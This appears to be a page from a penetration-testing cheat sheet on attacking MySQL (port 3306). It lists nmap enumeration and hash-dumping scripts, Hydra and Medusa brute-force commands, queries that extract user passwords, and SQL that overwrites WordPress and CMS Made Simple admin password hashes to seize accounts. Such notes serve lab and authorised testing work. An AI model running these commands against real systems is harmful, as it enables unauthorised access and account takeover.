MySql 3306

1. Nmap MySQL Scanning:

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.10

2. Bruteforcing MySQL Credentials:

Hydra (for password brute-forcing):

sudo hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.101.178 mysql

Medusa (alternative to Hydra):

medusa -h 10.10.10.10 -u bob -P rockyou.txt -M mysql

3. Internal MySQL Database Enumeration:

Once you gain access to a MySQL database, you can run the following commands to enumerate users and databases:

List Databases:
```
show databases;
```
Select a Database (example: textpattern):
```
use textpattern;
```
List Tables in the Database:
```
show tables;
```
Enumerate Users:
```
select * from users;
```
List Specific User Information (e.g., username, email, password):
```
select username,email,password from users;
```

4. MySQL to System Root:

Refer to the following guide for methods of privilege escalation from MySQL to system root on Linux: Recipe for Root - MySQL to System Root

5. Resetting a MySQL Admin Password:

If you have access to the database and can see the hash of the password for the admin user, you can update the password hash as follows:

Example for WordPress:

Generate an MD5 hash of the new password (redcliff in this case):
```
echo -n "redcliff" | md5sum
```
Update the password in the MySQL database (assuming you are using MariaDB/MySQL):
```
update wp_users set user_pass = '8d70e0d1acb06b4648c7aa8927509660' where ID = 1;
```

Example for CMS Made Simple 2.2.13:

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'redcliff'))) where username = 'admin';

6. Connecting Remotely to MySQL:

mysql -u root -h 192.168.101.184 -p

Dedicated Sections for SQL Injection/Privilege Escalation:

PreviousNFS 2049 NextRDP 3389

Last updated 1 year ago